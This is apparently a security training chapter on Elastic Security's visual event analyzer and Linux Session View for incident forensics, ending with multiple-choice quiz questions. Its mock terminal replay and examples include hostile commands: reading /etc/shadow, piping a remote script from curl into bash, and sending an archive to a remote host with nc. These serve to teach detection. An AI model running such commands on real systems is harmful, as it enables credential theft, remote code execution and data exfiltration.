11.3 Visual Event Analyzer & Session View Forensics

Key Takeaways

  • The visual event analyzer reconstructs parent-child process lineage from Elastic Defend (or Winlogbeat Sysmon) events, exposing living-off-the-land attack chains.

  • Process tree nodes correlate process IDs with globally unique process.entity_id identifiers, resolving operating system PID recycling anomalies during longitudinal investigations.

  • Selecting a process shows its details (path, PID, user, alerts) and the events it produced, grouped by category such as file and network activity.

  • Session View (Enterprise) shows Linux session activity as a process tree ordered by parentage and time, with a terminal output view when Capture terminal output is enabled in the Elastic Defend policy.

  • Monitoring interactive terminal sessions enables real-time detection of privilege escalation (sudo, su, SUID abuse) and manual reconnaissance commands that bypass traditional alert rules.

Last updated: September 2026

The Need for Host Execution Genealogy in Threat Forensics

Modern endpoint threats rarely manifest as isolated, easily recognizable malicious executables dropped onto a disk. Sophisticated adversaries and ransomware operators increasingly rely on Living-off-the-Land (LotL) techniques—weaponizing legitimate operating system utilities (such as powershell.exe, wmic.exe, certutil.exe, mshta.exe, or bash) to download payloads, execute scripts in memory, and evade static signature defenses.

When evaluating a single log line in an alert table, an entry such as powershell.exe -enc ... or whoami provides little immediate insight into threat context. Was the command launched by an IT administrator through a legitimate management tool, or was it spawned by a malicious macro executing inside Microsoft Word? To answer this question, incident responders require host execution genealogy. Elastic Security provides two host forensic tools to address this challenge: the visual event analyzer (a process tree view) and Session View.


Visual Event Analyzer: Architecture and Process Trees

The visual event analyzer renders an interactive, graphical parent-child process hierarchy showing the processes that led up to an alert and what happened after it. It works for events from Elastic Defend (agent.type: "endpoint") and for Sysmon data from Winlogbeat, as long as process.entity_id is present. Open it with the Analyze event icon on an alert or event (for example from the Alerts table or the Events tab of the Hosts page), from the flyout's Analyzer preview, or from the Analyzer tab in Timeline. Cold and frozen tier data can be excluded if it slows the analyzer down.

+--------------------------------------------------------------------------+
| Visual Event Analyzer: Living-off-the-Land Attack Lineage                |
+--------------------------------------------------------------------------+
| [winword.exe] (PID: 4112 | Signed: Microsoft Corporation | User: rchen)  |
|       |                                                                  |
|       +--> [cmd.exe] (PID: 5820 | Arguments: /c powershell.exe ...)       |
|                 |                                                        |
|                 +--> [powershell.exe] (PID: 7244 | Encoded Script)       |
|                           |                                              |
|                           +--> [whoami.exe] (PID: 8104 | Reconnaissance) |
|                           |                                              |
|                           +--> [certutil.exe] (PID: 8940 | Ingress Tool) |
|                                     |                                    |
|                                     +--> Network: 198.51.100.22:443      |
|                                     +--> File: C:\Users\...\payload.exe  |
+--------------------------------------------------------------------------+

1. Hierarchical Lineage Reconstruction

The Process Tree visualizes the entire chain of execution leading up to and following a suspicious event:

  • Root Process: The ancestor process that initiated the chain (e.g., explorer.exe for interactive user sessions, or services.exe for system services).
  • Parent Process: The direct creator process (process.parent.*), exposing anomalous relationships (such as an Office application or web server spawning a command shell).
  • Child and Grandchild Processes: Downstream processes spawned by the target node, revealing follow-on post-exploitation, staging, and reconnaissance.

2. Resolving Operating System PID Recycling: The process.entity_id

A fundamental flaw in traditional operating system logging is PID recycling. Operating systems assign process identifiers (PIDs) from a finite integer pool (e.g., 1 to 65535). Over days or weeks, the OS frequently reuses the same PID for completely unrelated processes. If an analyst queries a standard PID across a 30-day window, events from multiple distinct process instances become hopelessly entangled.

Elastic Defend solves this problem by generating a globally unique identifier stored in process.entity_id (and process.parent.entity_id):

process.entity_id=f(host.id,process.pid,process.start timestamp,unique session id)\text{process.entity\_id} = f(\text{host.id}, \text{process.pid}, \text{process.start timestamp}, \text{unique session id})

Because the identifier is derived from values that together identify one process instance (host, PID, start time and so on), it stays unique even when the operating system reuses PIDs. The analyzer uses process.entity_id and process.parent.entity_id to link parent and child nodes, which prevents false associations caused by PID reuse.


Detailed Node Forensics and Associated Artifacts

Selecting a process in the analyzer's graph or left panel shows its details: how many events are associated with it, when it ran, its file path, PID, user and domain, related alerts, and other process fields. Each associated event can be opened from there:

1. Process Metadata and Binary Verification

  • Command Line Arguments (process.command_line): Displays the full, un-truncated execution string, including hidden flags, injected DLLs, and obfuscated base64 scripts.
  • Executable Hash (process.hash.sha256, process.hash.md5): Displays cryptographic hashes of the on-disk binary, with one-click pivots to VirusTotal or external threat intelligence providers.
  • Code Signature Verification (process.code_signature.*): Displays signature validity (trusted: true/false), the signing subject (subject_name: "Microsoft Windows"), and certificate authority status. This immediately unmasks binary masquerading (e.g., an unsigned binary named svchost.exe).

2. Associated Telemetry Tabs

The analyzer groups the events associated with that process.entity_id by category, so you can move from the process to what it did:

  • File Activity Tab: Catalogs every file created, modified, or deleted by the process (event.category: "file"). In ransomware investigations, clicking the malicious process node instantly reveals the full list of encrypted documents and dropped ransom notes.
  • Network Activity Tab: Displays all inbound and outbound network connections initiated by the node (event.category: "network"), including destination IPs, destination ports, domain names queried, and total bytes transferred. This isolates C2 channels directly to the responsible executable.
  • Registry Activity Tab: Catalogs Windows registry keys added, modified, or deleted (event.category: "registry"), exposing persistence mechanisms (such as Run keys, service installations, or scheduled task registrations).

Session View: Linux Terminal Forensics & Interactive Replay

While the visual event analyzer excels at inspecting structured executable hierarchies (predominant in Windows environments), investigating Linux intrusions presents distinct challenges. Attackers operating on Linux servers frequently gain shell access via SSH, web shells, or exposed container APIs, conducting attacks through interactive command-line sessions. Analyzing thousands of disjointed execve audit events in a flat table makes it nearly impossible to understand what the attacker was doing in real time.

Session View is Elastic Security's forensic interface for Linux session data collected by Elastic Defend. It organizes processes in a tree by parentage and time of execution, following the Linux logical event model. It requires an Enterprise subscription and the Collect session data option in the Elastic Defend policy's Linux event collection settings. Capture terminal output is a separate toggle.

+--------------------------------------------------------------------------+
| Linux Session View: Host srv-web-prod01 | User: www-data -> root         |
+--------------------------------------------------------------------------+
| Session 1: Started 2026-09-30 09:12:00 | Terminal: pts/2 | Subshells: 2   |
+--------------------------------------------------------------------------+
| [09:12:05] www-data@srv-web-prod01$ whoami                             |
|   -> Output: www-data                                                    |
| [09:12:14] www-data@srv-web-prod01$ id                                 |
|   -> Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)      |
| [09:12:45] www-data@srv-web-prod01$ find / -perm -4000 2>/dev/null       |
|   -> (SUID Binary Enumeration Detected)                                  |
| [09:13:20] www-data@srv-web-prod01$ sudo -i                             |
|   -> (Privilege Escalation: User transitioned to root)                   |
| [09:13:25] root@srv-web-prod01# cat /etc/shadow                         |
|   -> (Credential Access: Sensitive file read)                            |
| [09:14:02] root@srv-web-prod01# curl -s http://198.51.100.9/b.sh | bash |
|   -> (Ingress Payload Execution: Download and Pipe to Shell)             |
+--------------------------------------------------------------------------+

1. Data Foundation: Elastic Defend Session Data

Session View can only show data that Elastic Defend collected while Collect session data was on. With that setting, Defend adds session context (session leader, entry leader, TTY) to its Linux process, file and network events, using kernel instrumentation such as eBPF where available:

  • Captures process executions, pseudoterminal allocations (/dev/pts/*), terminal input, and output streams.
  • Tracks parent shell sessions across process boundaries, associating subshells and background forks to the primary interactive session.

2. Interactive Terminal Replay

Session View shows a session as an ordered tree of the commands (processes) that ran in it, rather than disconnected log rows. With Capture terminal output enabled, a Terminal output view also replays what the user saw, and commands that produced output get an Output badge. Investigators see:

  • Execution Timestamps: Exact microsecond time of command entry.
  • User and Host Context: Prompt strings showing user transitions (e.g., initial login as jdoe, elevating via su - or sudo -i to root).
  • Command Arguments and Pipelines: Captures piped and chained shell sequences (e.g., tar -czf - /var/www | nc 198.51.100.9 4444).

3. Detecting Privilege Escalation and Interactive Reconnaissance

Session View is specifically optimized to expose interactive post-exploitation techniques that evade traditional threshold detection rules:

  • Privilege Escalation Transitions: Visualizes the exact point where an unprivileged service account (e.g., www-data or tomcat) executes privilege escalation exploits or sudo commands to acquire root access.
  • Interactive Reconnaissance Streams: Identifies manual human exploration characterized by rapid sequences of discovery commands (whoami, uname -a, cat /etc/passwd, netstat -tlpn, ip route).
  • Terminal vs. Daemon Discrimination: Distinguishes between automated system crons (which run non-interactively without a controlling terminal) and live human or web-shell intruders operating within an allocated TTY/PTS.

Comparison: Visual Event Analyzer vs. Session View

The following technical comparison contrasts the capabilities, underlying data models, and primary investigative targets of the visual event analyzer and Session View:

Technical AttributeVisual Event AnalyzerSession View (Linux Terminal Forensics)
Primary Telemetry Sourcelogs-endpoint.events.process-* (Elastic Defend)Elastic Defend Linux kernel tracing (eBPF / LSM streams)
Supported Operating SystemsWindows, Linux, macOS (Elastic Defend), plus Sysmon data from WinlogbeatLinux hosts with Elastic Defend session data collection enabled (Enterprise)
Core Visual MetaphorHierarchical directed acyclic graph (Tree nodes)Chronological terminal console transcript (Session stream)
Primary Identifierprocess.entity_id and process.parent.entity_idSession and entry leader fields (e.g. process.entry_leader.entity_id) and process.tty
Associated ArtifactsRelated events for each process, grouped by category (file, network, registry)Commands, user changes, optional captured environment variables and terminal output
Primary Attack ScenariosLiving-off-the-Land (LOLBAS), process hollowing, macro executionWeb shell interaction, SUID privilege escalation, manual SSH lateral movement
Key Investigative ValueUnmasks deceptive parent-child relationships and binary masqueradingReconstructs the exact narrative and intent of an interactive human intruder
Loading diagram...
Living-off-the-Land Attack Lineage in the Visual Event Analyzer
Test Your Knowledge

Why does Elastic Defend generate and rely upon 'process.entity_id' rather than operating system process IDs (PIDs) when building hierarchical execution trees in the visual event analyzer?

A

Operating systems encrypt process IDs, making raw PIDs unreadable by SIEM detection engines.

B

Operating system PIDs are frequently recycled and reused over time, whereas 'process.entity_id' is a globally unique identifier combining host ID, process start time, and PID to prevent false event correlation.

C

Process IDs cannot be indexed by Elasticsearch due to strict Lucene field name character limitations.

D

Elastic Defend only runs on non-standard microkernel operating systems that do not implement traditional PIDs.

Test Your Knowledge

A Tier 2 incident responder is investigating an intrusion on a production Linux web server. The responder suspects that an attacker exploited a vulnerability in an Apache web application and executed interactive bash commands to explore the environment. Which Elastic Security feature should the responder open to replay the attacker's interactive terminal commands, prompt transitions, and shell pipelines?

A

Session View

B

Kibana Lens Bar Chart

C

Index Lifecycle Management (ILM) Policy Editor

D

Fleet Agent Enrollment Token Manager

Test Your Knowledge

During a malware triage investigation in the visual event analyzer, an analyst highlights a suspicious 'certutil.exe' node spawned by PowerShell. The analyst needs to determine what files were written to disk and what remote IP addresses were contacted by this specific execution of certutil.exe. How can the analyst obtain this information directly within the analyzer?

A

Restart the target endpoint in recovery mode to dump the NTFS master file table.

B

Navigate to the Kibana Management menu and reindex the entire '.alerts-security.alerts-*' data stream.

C

Delete the Process Tree saved object and craft a manual SQL query against Active Directory.

D

Select the certutil.exe process in the analyzer and review its details panel, which lists the file and network events associated with that specific process instance.

Sections you finish are checked off in the contents.